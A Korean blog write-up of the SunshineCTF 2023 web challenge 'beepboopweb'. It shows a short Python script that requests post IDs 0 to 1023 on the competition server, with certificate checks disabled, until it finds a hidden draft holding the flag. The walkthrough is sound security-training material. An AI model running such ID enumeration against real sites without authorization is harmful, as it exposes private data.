[sunshine CTF 2023] beepboopweb Writeup

2023. 10. 19. 00:17· 웹해킹
목차
  1. 익스플로잇 코드

현재는 열리지 않지만, 해당 블로그에 들어가면 로봇이 작성한 매우 많은 글들이 있다.

해당 글들에는 #000 과 같은 번호로 글이 작성되어있다.

 

힌트에 있듯이 초안에 flag가 있다고 했는데, #000은 보이지 않았다. 

/post/0 으로 직접 데이터를 받아왔는데 req header에 hidden 속성이 있었다. hidden : false 인 글들만 보이는걸로 보아 hidden:True 인 걸 찾으면 되지 않을까 했다. 따라서 총 글의 수가 1023이니, 1023까지 get을 하며 hidden 이 true인 것을 찾으면 되겠다고 생각했다.

 

익스플로잇 코드

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

for i in range(1024):
    print(f"Trying {i}")
    url = f"https://beepboop.web.2023.sunshinectf.games/post/{i}/"
    try:
        response = requests.get(url, verify=False)
    except requests.exceptions.SSLError:
        continue
    if "hidden\":true" in response.text:
        print(f"Found hidden post at {url}")
        print(response.text)
        break

 

 

성공!

'웹해킹' 카테고리의 다른 글

칼리 리눅스 툴 [Gobuster]  (0) 2023.11.02
드림핵 pathtraversal write up  (0) 2023.11.02
[sunshine CTF 2023] hotdog_stand writeup  (0) 2023.10.19
  1. 익스플로잇 코드
'웹해킹' 카테고리의 다른 글
  • 칼리 리눅스 툴 [Gobuster]
  • 드림핵 pathtraversal write up
  • [sunshine CTF 2023] hotdog_stand writeup
세종대학교 S.S.G / WHS 2기
세종대학교 S.S.G / WHS 2기
이것 저것 다해요
세종대학교 S.S.G / WHS 2기
Barrack의 고군분투
세종대학교 S.S.G / WHS 2기
전체
오늘
어제
  • 분류 전체보기
    • 시스템해킹
    • 웹해킹
    • 포렌식
    • 머신러닝
    • 취약점 정리
    • 정보보호

블로그 메뉴

  • 홈
  • 태그
  • 방명록

공지사항

인기 글

태그

  • 침해사고
  • 메모리 #스택 #어셈블리
  • IOT
  • 정보보안
  • Pwnable
  • SYSTEMHACKING
  • hookoverwrite
  • 시스템해킹
  • 라업
  • canari
  • ROP #offset #x64 #ret #vuln #PIE #gadget #lazenca
  • writeup
  • 시스템해킹 #lazenca #ROP #x64 #ROP-x64 #취약점
  • cybersecurity
  • dreamhack #드림핵 #웹해킹 #pathtraversal #burpsuite #워게임 #writeup #문제풀이
  • rop #movaps #exploit #x64
  • Pwnable.kr
  • 해킹
  • 드림핵
  • ShellShock
  • System
  • 정보보호
  • dreamhack
  • 시스탬해킹
  • 포너블
  • Gobuster #웹해킹 #kali #linux #칼리 #모의해킹 #웹 #dir
  • 2023
  • 라자루스
  • IoT 보안
  • 파이프라이닝

최근 댓글

최근 글

hELLO · Designed By 정상우.v4.2.2
세종대학교 S.S.G / WHS 2기
[sunshine CTF 2023] beepboopweb Writeup
상단으로

티스토리툴바

단축키

내 블로그

내 블로그 - 관리자 홈 전환
Q
Q
새 글 쓰기
W
W

블로그 게시글

글 수정 (권한 있는 경우)
E
E
댓글 영역으로 이동
C
C

모든 영역

이 페이지의 URL 복사
S
S
맨 위로 이동
T
T
티스토리 홈 이동
H
H
단축키 안내
Shift + /
⇧ + /

* 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.